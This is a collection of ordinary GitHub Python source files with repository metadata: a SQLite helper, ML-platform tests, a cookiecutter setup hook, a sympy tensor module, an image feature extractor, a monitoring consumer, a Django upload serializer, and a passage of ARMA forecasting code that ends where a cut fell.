+{"seq_id":"9381675430","text":"from sqlite3 import Error, connect\nfrom logging import info\n\n\nclass DbManager:\n db = None\n\n def __init__(self, path_db):\n try:\n DbManager.db = connect(path_db, check_same_thread=False)\n DbManager.db.isolation_level = None\n except Error:\n raise\n\n @staticmethod\n def close_db():\n try:\n DbManager.db.close()\n except Error:\n raise\n\n @staticmethod\n def row_to_dict(cursor, row):\n data = {}\n for idx, col in enumerate(cursor.description):\n data[str.lower(col[0])] = row[idx]\n return data\n\n @staticmethod\n def select(query):\n try:\n cur = DbManager.db.cursor()\n cur.row_factory = DbManager.row_to_dict\n info(\"ESEGUO LA QUERY: %s\", query)\n cur.execute(str(query))\n result = cur.fetchall()\n except Error:\n DbManager.db.rollback()\n raise\n return result\n\n @staticmethod\n def insert_or_update(query):\n try:\n cur = DbManager.db.cursor()\n info(\"ESEGUO LA QUERY: %s\", query)\n cur.execute(str(query))\n DbManager.db.commit()\n except Error:\n DbManager.db.rollback()\n raise\n\n @staticmethod\n def multiple_statement(query):\n try:\n cur = DbManager.db.cursor()\n cur.executescript(str(query))\n DbManager.db.commit()\n except Error:\n DbManager.db.rollback()\n raise\n","repo_name":"sgarzo10/WorkPixil","sub_path":"src/dbmanager.py","file_name":"dbmanager.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"28915250257","text":"import pytest\n\nimport verta.configuration\n\n\nclass TestInternalFunctions:\n def test_value_to_msg(self):\n fn = verta.configuration.Hyperparameters._value_to_msg\n\n assert fn(0)\n assert fn(0.3)\n assert fn(\"coconut\")\n\n def test_hyperparameter_to_msg(self):\n fn = verta.configuration.Hyperparameters._hyperparameter_to_msg\n\n assert fn(\"banana\", 0)\n assert fn(\"banana\", 0.3)\n assert fn(\"banana\", \"foo\")\n\n def test_hyperparamater_range_to_msg(self):\n fn = verta.configuration.Hyperparameters._hyperparameter_range_to_msg\n\n assert fn(\"banana\", (0, 12, 3))\n with pytest.raises(TypeError):\n fn(\"banana\", 0)\n with pytest.raises(ValueError):\n fn(\"banana\", (0, 12))\n\n def test_hyperparameter_set_to_msg(self):\n fn = verta.configuration.Hyperparameters._hyperparameter_set_to_msg\n\n assert fn(\"banana\", list(range(0, 12, 3)))\n with pytest.raises(TypeError):\n fn(\"banana\", 0)\n\nclass TestHyperparameters:\n HYPERPARAMETERS = {'banana': \"foo\"}\n HYPERPARAMETER_RANGES = {'coconut': (0, 12, 3)}\n HYPERPARAMETER_SETS = {'durian': list(range(0, 12, 3))}\n\n def test_hyperparameters(self):\n config = verta.configuration.Hyperparameters(\n hyperparameters=self.HYPERPARAMETERS,\n )\n\n name, value = list(self.HYPERPARAMETERS.items())[0]\n\n hyperparam_msg = config._msg.hyperparameters[0]\n assert hyperparam_msg.name == name\n value_msg = hyperparam_msg.value\n assert getattr(value_msg, value_msg.WhichOneof('value')) == value\n\n def test_hyperparamater_ranges(self):\n config = verta.configuration.Hyperparameters(\n hyperparameter_ranges=self.HYPERPARAMETER_RANGES,\n )\n\n name, (begin, end, step) = list(self.HYPERPARAMETER_RANGES.items())[0]\n\n hyperparam_msg = config._msg.hyperparameter_set[0]\n assert hyperparam_msg.name == name\n begin_msg = hyperparam_msg.continuous.interval_begin\n assert getattr(begin_msg, begin_msg.WhichOneof('value')) == begin\n end_msg = hyperparam_msg.continuous.interval_end\n assert getattr(end_msg, end_msg.WhichOneof('value')) == end\n step_msg = hyperparam_msg.continuous.interval_step\n assert getattr(step_msg, step_msg.WhichOneof('value')) == step\n\n def test_hyperparameter_sets(self):\n config = verta.configuration.Hyperparameters(\n hyperparameter_sets=self.HYPERPARAMETER_SETS,\n )\n\n name, sequence = list(self.HYPERPARAMETER_SETS.items())[0]\n\n hyperparam_msg = config._msg.hyperparameter_set[0]\n assert hyperparam_msg.name == name\n for value_msg, value in zip(hyperparam_msg.discrete.values, sequence):\n assert getattr(value_msg, value_msg.WhichOneof('value')) == value\n\n def test_commit(self, commit):\n config = verta.configuration.Hyperparameters(\n hyperparameters=self.HYPERPARAMETERS,\n hyperparameter_ranges=self.HYPERPARAMETER_RANGES,\n hyperparameter_sets=self.HYPERPARAMETER_SETS,\n )\n\n commit.update('config', config)\n commit.save(message=\"banana\")\n assert commit.get('config')\n\n def test_repr(self):\n \"\"\"Tests that __repr__() executes without error\"\"\"\n config = verta.configuration.Hyperparameters(\n hyperparameters={\n 'a': 1, 'b': 1,\n },\n hyperparameter_ranges={\n 'c': (1, 5, 1), 'd': (1, 5, 1),\n },\n hyperparameter_sets={\n 'e': [1, 2], 'f': [1, 2],\n },\n )\n\n assert config.__repr__()\n","repo_name":"yongsheng268/VertaAI-modeldb","sub_path":"client/verta/tests/test_versioning/test_configuration.py","file_name":"test_configuration.py","file_ext":"py","file_size_in_byte":3684,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"13477001376","text":"import logging\nimport os\nimport sys\n\n# Target Python version choose by user\nREQUIRED_PYTHON_VERSION = \"{{ cookiecutter.python_version }}\"\n\n# Command template to update pyenv to latest values\nUPDATE_PYENV_COMMAND = \"pyenv update\"\n\n# Command template to find latest available Python version from pyenv given required version (BASH required)\nFIND_LATEST_PYTHON_VERSION_AVAILABLE_COMMAND = \"pyenv install --list | grep -v - | grep -v b | grep {} | tail -1\"\n\n# Command template to install some specific Python version with pyenv\nINSTALL_PYTHON_COMMAND = \"pyenv install {}\"\n\n# Command template to ensure poetry, tox and pre-commit are installed\nINSTALL_POETRY_AND_TOX_COMMAND = \"pyenv local {} && pip install --upgrade pip && pipx install poetry && pipx install tox && pipx install pre-commit\"\n\n# Command template to create some virtual environment inside project folder (make easy to use IDEs)\nCREATE_VIRTUAL_ENVIRONMENT_COMMAND = \"pyenv local {} && python -m venv .venv\"\n\n# Command template to install all dependencies on virtual environment\nINSTALL_DEPENDENCIES_ON_VIRTUAL_ENVIRONMENT_COMMAND = \"poetry install\"\n\n# Command template to initialize git with pre-commit hooks\nINIT_GIT_ON_PROJECT_COMMAND = \"git init && pre-commit install\"\n\n\ndef install_base_dependencies():\n def get_latest_python_version():\n if sys.platform.startswith(\"win\"):\n sys.exit(\"Windows platform currently not supported\")\n else:\n cmd = FIND_LATEST_PYTHON_VERSION_AVAILABLE_COMMAND.format(REQUIRED_PYTHON_VERSION)\n latest_version = os.popen(cmd).read().strip()\n logging.info(\"Using more recent python version from {}: {}\".format(REQUIRED_PYTHON_VERSION, latest_version))\n return latest_version\n\n def ensure_pyenv_is_updated():\n logging.info(\"Updating pyenv\")\n os.system(UPDATE_PYENV_COMMAND)\n\n def ensure_python_version_is_installed():\n logging.info(\"Following Python version will be installed: {}\".format(python_version))\n cmd = INSTALL_PYTHON_COMMAND.format(python_version)\n os.system(cmd)\n\n def ensure_poetry_and_tox_are_installed():\n logging.info(\"Installing poetry.\")\n cmd = INSTALL_POETRY_AND_TOX_COMMAND.format(python_version)\n os.system(cmd)\n\n def ensure_virtual_env_is_created():\n logging.info(\"Creating virtualenv inside project directory.\")\n cmd = CREATE_VIRTUAL_ENVIRONMENT_COMMAND.format(python_version)\n os.system(cmd)\n\n def install_all_dependencies():\n logging.info(\"Install all dependencies on virtual environment.\")\n cmd = INSTALL_DEPENDENCIES_ON_VIRTUAL_ENVIRONMENT_COMMAND\n os.system(cmd)\n\n def init_git_on_local():\n logging.info(\"Initialize git repository on local with pre-commit hooks.\")\n cmd = INIT_GIT_ON_PROJECT_COMMAND\n os.system(cmd)\n\n ensure_pyenv_is_updated()\n python_version = get_latest_python_version()\n ensure_python_version_is_installed()\n ensure_poetry_and_tox_are_installed()\n ensure_virtual_env_is_created()\n install_all_dependencies()\n init_git_on_local()\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO)\n install_base_dependencies()\n","repo_name":"jazumaquero/python_template","sub_path":"base/hooks/post_gen_project.py","file_name":"post_gen_project.py","file_ext":"py","file_size_in_byte":3197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"17582637957","text":"import unittest\n\nimport numpy as NP\n\n\ntry:\n import sympy\n X, Y, Z = sympy.symbols('X Y Z')\n HAVE_SYMPY = True\nexcept ImportError:\n HAVE_SYMPY = False\n\ndef flatten(x):\n \"\"\"flatten(sequence) -> list\n\n Returns a single, flat list which contains all elements retrieved\n (iterables).\n\n Examples:\n >>> [1, 2, [3,4], (5,6)]\n [1, 2, [3, 4], (5, 6)]\n >>> flatten([[[1,2,3], (42,None)], [4,5], [6], 7, MyVector(8,9,10)])\n [1, 2, 3, 42, None, 4, 5, 6, 7, 8, 9, 10]\"\"\"\n\n result = []\n for el in x:\n if hasattr(el, \"__iter__\") and not isinstance(el, str):\n result.extend(flatten(el))\n else:\n result.append(el)\n return result\n\nclass Tensor:\n\n is_tensor = 1\n\n def __init__(self, elements, nocheck = None):\n\n self.array = NP.array(elements)\n if nocheck is None:\n if not NP.logical_and.reduce(NP.equal(NP.array(self.array.shape), 3)):\n raise ValueError('Tensor must have length 3 along any axis')\n self.rank = len(self.array.shape)\n\n def __repr__(self):\n return str(self)\n\n def __str__(self):\n s = 'TensorModule.Tensor(numpy.array(' + str(self.array) + ') )'\n s = s.replace('\\n', ',')\n return s\n\n def __add__(self, other):\n return Tensor(self.array+other.array, 1)\n __radd__ = __add__\n\n def __neg__(self):\n return Tensor(-self.array, 1)\n\n def __sub__(self, other):\n return Tensor(self.array-other.array, 1)\n\n def __rsub__(self, other):\n return Tensor(other.array-self.array, 1)\n\n def __rmul__(self, other):\n if isTensor(other):\n return Tensor(self.array*other.array, 1)\n else:\n return Tensor(self.array*other, 1)\n\n def __div__(self, other):\n if isTensor(other):\n if other.rank == 0:\n return Tensor(self.array/other.array, 1)\n else:\n raise TypeError(\"Can't divide by a tensor\")\n else:\n return Tensor(self.array/(1.*other), 1)\n\n def __rdiv__(self, other):\n raise TypeError(\"Can't divide by a tensor\")\n\n def __cmp__(self, other):\n if not isTensor(other):\n return NotImplemented\n if self.rank != other.rank:\n return 1\n else:\n return not NP.logical_and.reduce(\n NP.equal(self.array, other.array).flat)\n\n def __len__(self):\n return 3\n\n def __getitem__(self, index):\n elements = self.array[index]\n if type(elements) == type(self.array):\n return Tensor(elements)\n else:\n return elements\n\n def dot(self, other):\n if isTensor(other):\n a = self.array\n b = NP.transpose(other.array, list(range(1, other.rank))+[0])\n return Tensor(NP.inner(a, b), 1)\n else:\n return Tensor(self.array*other, 1)\n\n def sqrt(self):\n return Tensor(self.array**0.5, 1)\n\n def diagonal(self, axis1=0, axis2=1):\n if self.rank == 2:\n return Tensor([self.array[0, 0], self.array[1, 1], self.array[2, 2]])\n else:\n if axis2 < axis1:\n axis1, axis2 = axis2, axis1\n raise ValueError('Not yet implemented')\n\n def trace(self, axis1=0, axis2=1):\n if self.rank == 2:\n return self.array[0, 0]+self.array[1, 1]+self.array[2, 2]\n else:\n raise ValueError('Not yet implemented')\n\n def transpose(self):\n return Tensor(NP.transpose(self.array))\n\n def determinant(self):\n if NP.shape(self.array) == (3, 3) :\n M = self\n a = M[0, 0]\n b = M[0, 1]\n c = M[0, 2]\n d = M[1, 0]\n e = M[1, 1]\n f = M[1, 2]\n g = M[2, 0]\n h = M[2, 1]\n i = M[2, 2]\n Determinant = a*(e*i - f*h) - b*(d*i - f*g) + c*(d*h - e*g)\n return Determinant\n else :\n raise ValueError ('Tenseur must of rank 2 and shape 3 by 3')\n\n def inverse(self):\n if NP.shape(self.array) == (3, 3) :\n M = self\n a = M[0, 0]\n b = M[0, 1]\n c = M[0, 2]\n d = M[1, 0]\n e = M[1, 1]\n f = M[1, 2]\n g = M[2, 0]\n h = M[2, 1]\n i = M[2, 2]\n Mprime = NP.array([[ e*i - f*h, c*h - b*i, b*f - c*e ], [ f*g - d*i, a*i - c*g, c*d - a*f ], [ d*h - e*g, b*g - a*h, a*e - b*d ]])\n det = M.determinant()\n Inverse = Mprime*(1/det)\n return Tensor(Inverse)\n else :\n raise ValueError ('Tenseur must of rank 2 and shape 3 by 3')\n\n def symmetricalPart(self):\n if self.rank == 2:\n return Tensor(0.5*(self.array + \\\n NP.transpose(self.array,\n NP.array([1, 0]))),\n 1)\n else:\n raise ValueError('Not yet implemented')\n\n def matrixmultiply(self, other):\n if self.rank == 2 and other.rank == 2:\n return Tensor(NP.matrixmultiply(NP.transpose(self.array), other.array))\n else:\n raise ValueError('Tenseur must of rank 2')\n\n def asymmetricalPart(self):\n if self.rank == 2:\n return Tensor(0.5*(self.array - \\\n NP.transpose(self.array,\n NP.array([1, 0]))),\n 1)\n else:\n raise ValueError('Not yet implemented')\n\n def eigenvalues(self):\n if self.rank == 2:\n return eigenvals(self.array)\n else:\n raise ValueError('Undefined operation')\n\n def diagonalization(self):\n if self.rank == 2:\n ev, vectors = eigenvects(self.array)\n return ev, Tensor(vectors)\n else:\n raise ValueError('Undefined operation')\n\n def sympyVariables(self):\n variablesList = []\n for exp in NP.ravel(self.array):\n try:\n variablesList.append(exp.atoms(sympy.Symbol))\n except:\n pass\n if len(variablesList) > 3:\n raise ValueError('sympy Tensor must have less than 3 sympy variables')\n variablesSet = set(flatten(variablesList))\n return list(sorted(variablesSet))\n\n def produitDoubleContracte(self, other):\n if self.rank >= 2 and other.rank >= 2:\n resultat = NP.resize(0, [3]*(self.rank+other.rank-4))\n for j in range(3):\n resultat = resultat+NP.inner(NP.transpose(self.array[j]), other.array[j])\n else :\n raise ValueError('range of each Tensor must be at least 2')\n return Tensor(resultat)\n\n def produitSimpleContracte(self, other):\n rank = self.rank + other.rank - 2\n # Ruse pour produire un objet Sympy nul\n out_array = NP.array([X]*(3**rank))\n out_array.shape = [3, ]*rank\n if not (self.rank >= 1 and other.rank >= 1):\n raise ValueError('range of each Tensor must be at least 1')\n if self.rank == 1 and other.rank == 1:\n out_array = NP.dot(self.array, other.array)\n elif self.rank == 2 and other.rank == 1:\n for i in range(3):\n out_array[i] = NP.dot(self.array[i,:], other.array)\n elif self.rank == 2 and other.rank == 2:\n for i in range(3):\n for j in range(3):\n out_array[i][j] = NP.dot(self.array[i,:], other.array[:, j])\n elif self.rank == 4 and other.rank == 2:\n for i in range(3):\n for j in range(3):\n for k in range(3):\n for l in range(3):\n out_array[i][j][k][l] = NP.dot(self.array[i, j, k,:], other.array[:, l])\n else :\n raise NotImplemented\n return Tensor(out_array)\n\ndef isTensor(x):\n return isinstance(x, Tensor)\n\ndef grad(F):\n if not isTensor(F):\n raise ValueError('Argument must be a Tensor')\n varList = [X, Y, Z] #F.sympyVariables()\n gradF = NP.resize(F.array, flatten((F.array.shape, 3)))\n # see http://code.google.com/p/sympy/issues/detail?id=2622\n def _diff(elt, symb):\n \"\"\"apply sympy.diff on 'elt' or each element of 'elt' if iterable\"\"\"\n diff = lambda x: sympy.diff(x, symb)\n try:\n res = list(map(diff, elt))\n except TypeError:\n res = diff(elt)\n return res\n for i in range(3):\n gradF[i] = [_diff(elt, varList[i]) for elt in gradF[i].tolist()]\n return Tensor(NP.transpose(NP.array(gradF)))\n\ndef div(F):\n if not isTensor(F):\n raise ValueError('Argument must be a Tensor')\n varList = [X, Y, Z]#F.sympyVariables()\n if F.rank == 0:\n raise ValueError('Divergence just applies on Tensor with rank>0')\n elif F.rank == 1:\n return Tensor(sympy.diff(F[0], varList[0]) + sympy.diff(F[1], varList[1]) + sympy.diff(F[2], varList[2]))\n elif F.rank == 2:\n return Tensor([sympy.diff(F[0][0], varList[0]) + sympy.diff(F[0][1], varList[1]) + sympy.diff(F[0][2], varList[2]),\n sympy.diff(F[1][0], varList[0]) + sympy.diff(F[1][1], varList[1]) + sympy.diff(F[1][2], varList[2]),\n sympy.diff(F[2][0], varList[0]) + sympy.diff(F[2][1], varList[1]) + sympy.diff(F[2][2], varList[2])])\n elif F.rank == 3:\n return Tensor([[sympy.diff(F[0][0][0], varList[0]) + sympy.diff(F[0][0][1], varList[1]) + sympy.diff(F[0][0][2], varList[2]),\n sympy.diff(F[0][1][0], varList[0]) + sympy.diff(F[0][1][1], varList[1]) + sympy.diff(F[0][1][2], varList[2]),\n sympy.diff(F[0][2][0], varList[0]) + sympy.diff(F[0][2][1], varList[1]) + sympy.diff(F[0][2][2], varList[2])],\n [sympy.diff(F[1][0][0], varList[0]) + sympy.diff(F[1][0][1], varList[1]) + sympy.diff(F[1][0][2], varList[2]),\n sympy.diff(F[1][1][0], varList[0]) + sympy.diff(F[1][1][1], varList[1]) + sympy.diff(F[1][1][2], varList[2]),\n sympy.diff(F[1][2][0], varList[0]) + sympy.diff(F[1][2][1], varList[1]) + sympy.diff(F[1][2][2], varList[2])],\n [sympy.diff(F[2][0][0], varList[0]) + sympy.diff(F[2][0][1], varList[1]) + sympy.diff(F[2][0][2], varList[2]),\n sympy.diff(F[2][1][0], varList[0]) + sympy.diff(F[2][1][1], varList[1]) + sympy.diff(F[2][1][2], varList[2]),\n sympy.diff(F[2][2][0], varList[0]) + sympy.diff(F[2][2][1], varList[1]) + sympy.diff(F[2][2][2], varList[2])]]\n )\n else:\n raise ValueError('Not implemented for Tensor of rank > 3')\n\ndef laplacien(F):\n if not isTensor(F):\n raise ValueError('Argument must be a Tensor')\n LapF = div(grad(F))\n return LapF\n\ndef gradsym(F):\n if not isTensor(F):\n raise ValueError('Argument must be a Tensor')\n gradsymF = 0.5 * (grad(F) + grad(F).transpose())\n return gradsymF\n\n\n#\nclass TensorUnitTest(unittest.TestCase):\n\n def setUp(self):\n if not HAVE_SYMPY:\n return\n self.U = Tensor(NP.array(([X**3, sympy.sin(X), sympy.exp(X)],\n [Y**3, sympy.sin(Y), sympy.exp(Y)],\n [Z**3, sympy.sin(Z), sympy.exp(Z)])))\n\n def testType(self):\n if not HAVE_SYMPY:\n return\n self.assertEqual(isTensor(self.U), 1)\n\n def testRank(self):\n if not HAVE_SYMPY:\n return\n self.assertEqual(self.U.rank, 2)\n self.assertEqual(grad(self.U).rank, 3)\n\n def testGrad(self):\n if not HAVE_SYMPY:\n return\n self.assertEqual(grad(self.U), Tensor(NP.array([[[3*X**2, 0, 0 ], [0, 3*Y**2, 0 ], [0, 0, 3*Z**2 ]], [[sympy.cos(X), 0, 0 ], [0, sympy.cos(Y), 0 ], [0, 0, sympy.cos(Z) ]], [[sympy.exp(X), 0, 0 ], [0, sympy.exp(Y), 0 ], [0, 0, sympy.exp(Z) ]]])))\n\n def testGradSym(self):\n if not HAVE_SYMPY:\n return\n # attention: sensible 3.0*X**2 != 3*X**2\n self.assertEqual(gradsym(self.U), Tensor(NP.array(\n [[[3.0*X**2, 0.5*sympy.cos(X), 0.5*sympy.exp(X)], [0, 1.5*Y**2, 0], [0, 0, 1.5*Z**2]],\n [[0.5*sympy.cos(X), 0, 0], [1.5*Y**2, 1.*sympy.cos(Y), 0.5*sympy.exp(Y)], [0, 0, 0.5*sympy.cos(Z)]],\n [[0.5*sympy.exp(X), 0, 0], [0, 0.5*sympy.exp(Y), 0], [1.5*Z**2, 0.5*sympy.cos(Z), 1.*sympy.exp(Z)]]])))\n\n def testLaplacien(self):\n if not HAVE_SYMPY:\n return\n self.assertEqual(laplacien(self.U), Tensor(NP.array([[6*X, 6*Y, 6*Z ], [-sympy.sin(X), -sympy.sin(Y), -sympy.sin(Z) ], [sympy.exp(X), sympy.exp(Y), sympy.exp(Z) ]]) ))\n\n def testDivergence(self):\n if not HAVE_SYMPY:\n return\n self.assertEqual(div(grad(self.U)),\n Tensor(NP.array([[6*X, 6*Y, 6*Z ], [-sympy.sin(X), -sympy.sin(Y), -sympy.sin(Z) ], [sympy.exp(X), sympy.exp(Y), sympy.exp(Z) ]]) ))\n\n def testProduitDoubleContracte(self):\n if not HAVE_SYMPY:\n return\n TensO4Sym = Tensor(NP.array([[[[ 400., 0., 0., ],\n [ 0., 200., 0., ],\n [ 0., 0., 200., ]],\n [[ 0., 66.66666667, 0., ],\n [ 66.66666667, 0., 0., ],\n [ 0., 0., 0., ]],\n [[ 0., 0., 133.33333333],\n [ 0., 0., 0., ],\n [ 133.33333333, 0., 0., ]]],\n [[[ 0., 66.66666667, 0., ],\n [ 66.66666667, 0., 0., ],\n [ 0., 0., 0., ]],\n [[ 200., 0., 0., ],\n [ 0., 233.33333333, 0., ],\n [ 0., 0., 166.66666667]],\n [[ 0., 0., 0., ],\n [ 0., 0., 66.66666667],\n [ 0., 66.66666667, 0., ]]],\n [[[ 0., 0., 133.33333333],\n [ 0., 0., 0., ],\n [ 133.33333333, 0., 0., ]],\n [[ 0., 0., 0., ],\n [ 0., 0., 66.66666667],\n [ 0., 66.66666667, 0., ]],\n [[ 200., 0., 0., ],\n [ 0., 166.66666667, 0., ],\n [ 0., 0., 233.33333333]]]]) )\n\n self.assertEqual(TensO4Sym.produitDoubleContracte(self.U),\n Tensor(NP.array([[200.000000000000*sympy.sin(Y) + 400.000000000000*X**3 + 200.000000000000*sympy.exp(Z), 66.6666666700000*sympy.sin(X) + 66.6666666700000*Y**3, 133.333333330000*Z**3 + 133.333333330000*sympy.exp(X) ],\n [66.6666666700000*sympy.sin(X) + 66.6666666700000*Y**3, 233.333333330000*sympy.sin(Y) + 200.000000000000*X**3 + 166.666666670000*sympy.exp(Z), 66.6666666700000*sympy.sin(Z) + 66.6666666700000*sympy.exp(Y) ],\n [133.333333330000*Z**3 + 133.333333330000*sympy.exp(X), 66.6666666700000*sympy.sin(Z) + 66.6666666700000*sympy.exp(Y), 166.666666670000*sympy.sin(Y) + 200.000000000000*X**3 + 233.333333330000*sympy.exp(Z) ]])))\n\n def testproduitSimpleContracte(self):\n if not HAVE_SYMPY:\n return\n self.assertEqual(self.U.produitSimpleContracte(Tensor(NP.array([-1, 0, 0]))), Tensor(NP.array([-X**3, -Y**3, -Z**3])))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"ehmoussi/code_aster","sub_path":"code_aster/MacroCommands/Contrib/TensorModule.py","file_name":"TensorModule.py","file_ext":"py","file_size_in_byte":16421,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"21103272365","text":"#!/usr/bin/env python\n# coding=utf-8\n'''\nDescription: \nAuthor: yangyuxiang\nDate: 2021-03-19 00:03:13\nLastEditors: yangyuxiang\nLastEditTime: 2021-04-17 22:53:31\nFilePath: /Assignment2-3/data/transform_images.py\n'''\n\nimport os\nfrom os.path import dirname\nimport sys\nimport torch\nfrom torch import device\nimport torch.nn as nn\nfrom PIL import Image\nfrom tqdm import tqdm\nfrom torchvision import models, transforms\n\nsys.path.append('..')\nimport config\n\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.resnet = models.resnet101(pretrained=False)\n self.resnet.load_state_dict(torch.load(\"./resnet101-5d3b4d8f.pth\"))\n self.w = nn.Linear(2048, config.img_vec_dim)\n\n def forward(self, x):\n output = self.resnet.conv1(x)\n output = self.resnet.bn1(output)\n output = self.resnet.relu(output)\n output = self.resnet.maxpool(output)\n output = self.resnet.layer1(output)\n output = self.resnet.layer2(output)\n output = self.resnet.layer3(output)\n output = self.resnet.layer4(output)\n output = self.resnet.avgpool(output)\n output = self.w(output.permute(0, 3, 2, 1))\n output = torch.tanh(output)\n return output\n\n\ndef extract_vectors(img_path, net, device):\n transform = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Lambda(lambda x: x.repeat(1,1,1)),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ])\n \n img = Image.open(img_path)\n img = img.convert(\"RGB\")\n img = transform(img)\n# print(img.shape)\n \n img = img.unsqueeze(0).float()\n img = img.to(device)\n# print(img)\n output = net(img)\n return output\n\n\nif __name__ == \"__main__\":\n device = torch.device(\"cuda\" if config.is_cuda else \"cpu\")\n model = Net()\n model.to(device)\n image_data = []\n for path, dirnames, filenames in os.walk(config.data_folder):\n for filename in filenames:\n if filename.endswith(\"jpg\"):\n image_data.append(os.path.join(path, filename))\n\n print(\"has %s images.\" % len(image_data))\n with open(config.img_vecs, mode=\"w\", encoding='utf-8') as f:\n for img_path in tqdm(image_data):\n# print(img_path)\n output = extract_vectors(img_path, model, device)\n output = output.cpu()\n output = output.reshape(-1)\n output = output.data.numpy()\n# print(output.shape)\n img_name = img_path.split(\"/\")[-1]\n f.write(img_name + '\\t')\n f.write(\" \".join([str(v) for v in output.tolist()]))\n f.write(\"\\n\")\n \n \n \n\n\n\n\n ","repo_name":"yangyuxiang1996/Chinese-Text-Generation","sub_path":"data/transform_images.py","file_name":"transform_images.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"12846317304","text":"import datetime\nimport logging\n\nimport monitoring.entrypoint as redis_stream\nfrom monitoring.exceptions.monitoring import UnrecognizedMonitorName\nfrom monitoring.service.base import ServiceMixin\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass MainServiceMixin(ServiceMixin):\n @redis_stream.consume(\"cg-monitoring-service\", [\"MONITORING_STREAM\"])\n def consume_monitoring_stream(self, message_id, message):\n\n monitor_name = message[\"__MONITOR_NAME\"]\n\n logger.info(\n f\"{datetime.datetime.utcnow().isoformat()}: consuming {monitor_name} with id {message_id}\"\n )\n\n if monitor_name == \"API_REQUEST\":\n self.storage.api_requests.append(\n message_id,\n message.get(\"url\"),\n message.get(\"method\"),\n message.get(\"duration\"),\n message.get(\"status\"),\n message.get(\"status_code\"),\n message.get(\"remote_addr\"),\n )\n else:\n raise UnrecognizedMonitorName(f\"{monitor_name} is not recognized\")\n","repo_name":"findfeatures/monitoring-service","sub_path":"monitoring/service/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"22376992677","text":"from django.core.files.storage import default_storage\nfrom rest_framework import serializers\nfrom diagnosis_code.models import DiagnosisCode\nfrom .tasks import process_csv_file\n\n\nclass DiagnosisCodeSerializer(serializers.ModelSerializer):\n class Meta:\n model = DiagnosisCode\n fields = '__all__'\n\n\nclass FileUploadSerializer(serializers.Serializer):\n file = serializers.FileField(required=True, allow_null=False, allow_empty_file=False,)\n user_email = serializers.EmailField(required=False, allow_null=True, allow_blank=True)\n\n def create(self, validated_data):\n file = validated_data['file']\n file_name = default_storage.save(file.name, file)\n if not file_name or str(file_name.split(\".\")[-1]).lower() != \"csv\":\n raise serializers.ValidationError(\"Sorry we support only csv files\")\n process_csv_file.delay(file_name=file_name,\n user_email=validated_data.get('user_email', None))\n return True\n\n def update(self, instance, validated_data):\n raise NotImplementedError('Not required')\n","repo_name":"nshaibu/Test","sub_path":"api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"23349451892","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 28 15:01:59 2022\n\n@author: quindaly\n\"\"\"\nfrom scipy.stats.distributions import norm\nfrom scipy.optimize import fmin\nfrom scipy.optimize import minimize\nfrom scipy import linalg as la\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom statsmodels.tsa.arima_model import ARMA\nfrom statsmodels.tsa.arima.model import ARIMA\nfrom pydataset import data as pydata\nfrom statsmodels.tsa.stattools import arma_order_select_ic as order_select\nfrom statsmodels.tsa.base.datetools import dates_from_str\nimport pandas as pd\nimport statsmodels.api as sm\nfrom statsmodels.tsa.api import VARMAX\n\n\n#### Make an ARMA model from scratch using the next 4 functions ####\n\ndef arma_forecast_naive(file='weather.npy',p=2,q=1,n=20):\n \"\"\"\n Perform ARMA(1,1) on data. Let error terms be drawn from\n a standard normal and let all constants be 1.\n Predict n values and plot original data with predictions.\n\n Parameters:\n file (str): data file\n p (int): order of autoregressive model\n q (int): order of moving average model\n n (int): number of future predictions\n \"\"\"\n # Initialize\n data = np.load(file)\n z = list(np.diff(data))\n phi = 0.5\n theta = 0.1\n eps = [np.random.normal(0,1) for _ in range(q)]\n N = len(z) - 1\n \n # ARMA\n for t in range(n):\n ep = np.random.normal(0,1)\n arma = eps[t]\n eps.append(ep) \n \n for i in range(p):\n arma += phi * z[N+t-i]\n \n for i in range(q):\n arma += theta * eps[t-i]\n \n z.append(arma)\n \n \n # Plot the differences with predicted data\n plt.plot(np.linspace(0,N+1,N+1), z[:N+1])\n plt.plot(np.linspace(N+1,len(z),n),z[N+1:])\n plt.title('ARMA Naive Forecast')\n plt.show()\n\ndef arma_likelihood(file='weather.npy', phis=np.array([0.9]), thetas=np.array([0]), mu=17., std=0.4):\n \"\"\"\n Transfer the ARMA model into state space. \n Return the log-likelihood of the ARMA model.\n\n Parameters:\n file (str): data file\n phis (ndarray): coefficients of autoregressive model\n thetas (ndarray): coefficients of moving average model\n mu (float): mean of errorm\n std (float): standard deviation of error\n\n Return:\n log_likelihood (float)\n \"\"\"\n # Initialize\n data = np.load(file)\n z = np.diff(data)\n n = len(z)\n \n # Get the parameters from given methods below\n F,Q,H = state_space_rep(phis, thetas, mu, std)[:3]\n mus, covs = kalman(F,Q,H,z - mu)\n draws = []\n \n # Compute all of the draws from the normal\n for i in range(n): \n draw = norm.pdf(x=z[i], loc=H@mus[i] + mu, scale=np.sqrt(H@covs[i]@H.T))\n draws.append(draw)\n \n # Return log of the product of all draws\n return np.sum(np.log(draws))\n\n\n\ndef model_identification(file='weather.npy',p=1,q=1):\n \"\"\"\n Identify parameters to minimize AIC of ARMA(p,q) model\n\n Parameters:\n file (str): data file\n p (int): 